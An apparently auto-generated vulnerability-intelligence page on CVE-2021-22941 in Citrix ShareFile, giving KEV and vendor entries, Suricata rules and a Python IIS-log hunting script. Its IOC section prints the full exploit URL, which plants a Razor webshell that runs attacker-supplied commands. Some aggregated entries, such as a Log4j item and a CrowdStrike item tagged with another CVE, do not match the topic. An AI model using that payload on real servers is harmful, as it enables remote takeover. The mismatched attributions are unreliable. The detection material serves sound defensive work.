CVE-2021-22941
published 2021-09-23
CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage…
Priority P197, critical, 9.8 (CVSS 3.1)
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
KEV, ITW, Ransomware
CISA Known Exploited Vulnerability, due 2022-04-15
Exploited in the wild
EPSS: 53.59% (98.9th percentile)
Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citrix | citrix_adm | — | — |
| citrix | citrix_hypervisor | — | — |
| citrix | citrix_virtual_apps_and_desktops | — | — |
| citrix | endpoint_management | — | — |
| citrix | netscaler_adc | — | — |
| citrix | netscaler_gateway | — | — |
| citrix | sharefile | — | — |
| citrix | sharefile_storagezones_controller | < 5.11.20 | 5.11.20 |
| citrix | xenserver | — | — |
Detection & IOCs (extracted from sources)
url: /upload.aspx?uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123
command: uploadid=@using+System.Diagnostics;@{int+idx0=+0;string+str_idx0+=+idx0.ToString();+int+idx1+=+1;string+str_idx1+=+idx1.ToString();string+cmd+=+Request.QueryString[str_idx0];string+arg+=+Request.QueryString[str_idx1];Process.Start(cmd,arg);}
- Hunt IIS access logs for POST requests to /upload.aspx containing encoded path traversal strings for ../ and ConfigService\Views\Shared\Error.cshtml in URL parameters.
- Flag requests to /upload.aspx that include the default exploit parameters &bp=123&accountid=123, which are present in publicly available CVE-2021-22941 PoC exploits when the attacker has not customized the payload.
- The exploit delivers a Razor-syntax ASP.NET webshell via the uploadid parameter, using Process.Start(cmd,arg) for arbitrary command execution; detect creation or modification of Error.cshtml under ConfigService\Views\Shared\.
- The vulnerability allows an adversary to overwrite an existing file on a target server via an uploadid parameter passed in an HTTP GET request; monitor for unexpected writes to .cshtml files in the ShareFile web root.
- The default exploit parameters bp=123&accountid=123 are only present when the attacker has not customized the payload; absence of these values does not rule out exploitation.
- Fully weaponized exploits for CVE-2021-22941 have proliferated since mid-October 2021, meaning a wide variety of attacker tooling may produce different request signatures beyond the observed python-requests user agent.
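The log hunt described in the bullets above, as an added example in Python (not code from any of the cited sources). It assumes IIS W3C logging with the cs-uri-stem and cs-uri-query fields enabled; the log lines are constructed and the payload is replaced by a placeholder. It goes slightly beyond the bullets by decoding the query repeatedly to catch double-encoded traversal, and it matches on any HTTP method because the sources above mention both POST and GET.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (not real traffic); payload body is a placeholder.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2021-10-20 08:01:11 POST /upload.aspx uploadid=abc123&bp=1&accountid=77 192.0.2.10 Mozilla/5.0 200
2021-10-20 08:02:40 POST /upload.aspx uploadid=%40PLACEHOLDER%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123 198.51.100.7 python-requests/2.26.0 200
2021-10-20 08:03:05 GET /upload.aspx uploadid=x%252F..%252F..%252FConfigService%252FViews%252FShared%252FError.cshtml&bp=9&accountid=4 198.51.100.8 curl/7.79.1 200
2021-10-20 08:04:00 GET /default.aspx - 192.0.2.11 Mozilla/5.0 200
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")          # ../ or ..\ after decoding
CSHTML = re.compile(r"\.cshtml\b", re.I)      # Razor view as the write target
DEFAULT_POC = {"bp=123", "accountid=123"}     # unmodified public PoC parameters

def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so single- and double-encoded input compare equal."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def hunt(log_text):
    """Return upload.aspx requests whose query traverses to a .cshtml file."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]         # column order comes from the log itself
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split(" ")))
        if not row.get("cs-uri-stem", "").lower().endswith("/upload.aspx"):
            continue
        raw = row.get("cs-uri-query", "")
        query = fully_decode(raw)
        if not (TRAVERSAL.search(query) and CSHTML.search(query)):
            continue
        hits.append({
            "time": f'{row.get("date")} {row.get("time")}',
            "client": row.get("c-ip"),
            "method": row.get("cs-method"),
            "razor_at_sign": "@" in query,    # same marker the ET rule keys on
            "default_poc_params": DEFAULT_POC <= set(raw.lower().split("&")),
        })
    return hits
```

A hit with `default_poc_params` set to False is still a hit; that flag only raises confidence that an unmodified public PoC was used.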
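CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| vulncheck | | 10.0 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |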
CISA
Citrix ShareFile Improper Access Control Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2021-22941 [CRITICAL] CWE-284 Citrix ShareFile Improper Access Control Vulnerability
Vulnerability: Citrix ShareFile Improper Access Control Vulnerability
Affected: Citrix ShareFile
Improper Access Control in Citrix ShareFile storage zones controller may allow an unauthenticated attacker to remotely compromise the storage zones controller.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2021-22941
Remediation Due Date: 2022-04-15
Citrix
CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the s
vendor_citrix·2021-09-23·CVSS 9.8
CVE-2021-22941 [CRITICAL] CWE-284 CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the s
CVE-2021-22941: Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller.
CISA KEV: Improper Access Control in Citrix ShareFile storage zones controller may allow an unauthenticated attacker to remotely compromise the storage zones controller.
Required Action: Apply updates per vendor instructions.
Known ransomware campaign use.
Citrix
Citrix Security Bulletin CTX328123
vendor_citrix·CVSS 9.8
CVE-2021-22941 [CRITICAL] Citrix Security Bulletin CTX328123
Citrix Security Bulletin CTX328123
CVE References: CVE-2021-22941, CVE-2025-12101, CVE-2025-62626, CVE-2026-23554, CVE-2026-3055, CVE-2026-4368, CVE-2026-4397
Affected Products: Citrix ADM, Citrix Hypervisor, Citrix Virtual Apps and Desktops, Endpoint Management, NetScaler ADC, NetScaler Gateway, XenServer
GHSA
GHSA-83fg-h4qw-7574: Improper Access Control in Citrix ShareFile storage zones controller before 5
ghsa_unreviewed·2022-05-24
CVE-2021-22941 [CRITICAL] CWE-269 GHSA-83fg-h4qw-7574: Improper Access Control in Citrix ShareFile storage zones controller before 5
Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller.
VulnCheck
Apache Log4j2 Remote Code Execution Vulnerability
vulncheck·2021·CVSS 10.0
CVE-2021-44228 [CRITICAL] CWE-20 Apache Log4j2 Remote Code Execution Vulnerability
Apache Log4j2 Remote Code Execution Vulnerability
Apache Log4j2 contains a vulnerability where JNDI features do not protect against attacker-controlled JNDI-related endpoints, allowing for remote code execution.
Affected: Apache Log4j2
Required Action: For all affected software assets for which updates exist, the only acceptable remediation actions are: 1) Apply updates; OR 2) remove affected assets from agency networks. Temporary mitigations using one of the measures provided at https://www.cisa.gov/uscert/ed-22-02-apache-log4j-recommended-mitigation-measures are only acceptable until updates are available.
Known Ransomware Campaign Use: Known
Exploitation References: https://cisa.gov/news-events/cybersecurity-advisories/aa21-336a; https://api.vulncheck.com/v3/index/sans-dshield?cve=
VulnCheck
Citrix ShareFile Improper Access Control Vulnerability
vulncheck·2021·CVSS 9.8
CVE-2021-22941 [CRITICAL] CWE-284 Citrix ShareFile Improper Access Control Vulnerability
Citrix ShareFile Improper Access Control Vulnerability
Improper Access Control in Citrix ShareFile storage zones controller may allow an unauthenticated attacker to remotely compromise the storage zones controller.
Affected: Citrix ShareFile
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/; https://socprime.com/blog/cve-2021-22941-citrix-sharefile-remote-code-execution-vulnerability-exploited-by-prophet-spider/; https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/2022-unit42-ransomware-threat-report-final.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://static.tenable.com/m
Suricata
ET EXPLOIT Citrix ShareFile Storage Zones Controller RCE Attempt (CVE-2021-22941)
suricata·2022-01-25·CVSS 9.8
CVE-2021-22941 [CRITICAL] ET EXPLOIT Citrix ShareFile Storage Zones Controller RCE Attempt (CVE-2021-22941)
ET EXPLOIT Citrix ShareFile Storage Zones Controller RCE Attempt (CVE-2021-22941)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Citrix ShareFile Storage Zones Controller RCE Attempt (CVE-2021-22941)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/upload.aspx"; content:"id"; content:"|40|"; distance:0; content:"|2e 2e 2f|"; distance:0; content:"|2e|cshtml"; distance:0; fast_pattern; content:"bp"; content:"accountid"; http.header_names; to_lowercase; content:"|0d 0a|content-type|0d 0a|"; reference:cve,2021-22941; classtype:attempted-admin; sid:2034972; rev:3; metadata:attack_target Server, created_at 2022_01_25, cve CVE_2021_22941, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, ta
Suricata
ET EXPLOIT Possible Citrix ShareFile RCE Inbound (CVE-2021-22941)
suricata·2021-09-27·CVSS 9.8
CVE-2021-22941 [CRITICAL] ET EXPLOIT Possible Citrix ShareFile RCE Inbound (CVE-2021-22941)
ET EXPLOIT Possible Citrix ShareFile RCE Inbound (CVE-2021-22941)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Citrix ShareFile RCE Inbound (CVE-2021-22941)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"upload.aspx"; content:"id=../"; fast_pattern; content:"bp="; content:"accountid="; reference:url,codewhitesec.blogspot.com/2021/09/citrix-sharefile-rce-cve-2021-22941.html; reference:cve,2021-22941; classtype:attempted-admin; sid:2034033; rev:1; metadata:attack_target Server, created_at 2021_09_27, cve CVE_2021_22941, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2021_09_27, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_tec
No public exploits indexed.
Greynoiseio
The Sixth Day Of Tagsmas (2023): Citrix ShareFile Remote Code Execution Vulnerability (CVE-2023-24489)
blogs_greynoiseio·CVSS 9.8
[CRITICAL] The Sixth Day Of Tagsmas (2023): Citrix ShareFile Remote Code Execution Vulnerability (CVE-2023-24489)
Wiz
CVE-2026-2701 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-2701 [HIGH] CVE-2026-2701 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2701 :
Citrix ShareFile StorageZones Controller vulnerability analysis and mitigation
Authenticated user can upload a malicious file to the server and execute it, which leads to remote code execution.
Source : NVD
Score: 9.1
Published April 2, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Citrix ShareFile StorageZones Controller
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 40.8
Exploitation Probability (EPSS) 0.2
Affected packages and libraries
cpe:2.3:a:citrix:sharefile_storagezones_controller
Sources
Windows Has Fix Added at: Apr 05, 2026
Wiz
CVE-2026-2699 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-2699 [HIGH] CVE-2026-2699 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2699 :
Citrix ShareFile StorageZones Controller vulnerability analysis and mitigation
Customer Managed ShareFile Storage Zones Controller (SZC) allows an unauthenticated attacker to access restricted configuration pages. This leads to changing system configuration and potential remote code execution.
Source : NVD
Score: 9.8
Published April 2, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Citrix ShareFile StorageZones Controller
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 61.3
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
cpe:2.3:a:citrix:sharefile_storagezones_controller
Sources
Windows Has Fix Added at: Apr 05, 2026
Crowdstrike
PROPHET SPIDER Exploits Citrix ShareFile
blogs_crowdstrike·CVSS 7.5
CVE-2026-20929 [HIGH] PROPHET SPIDER Exploits Citrix ShareFile
2021-09-23: Published
2022-03-25: Added to CISA KEV
Exploited in the wild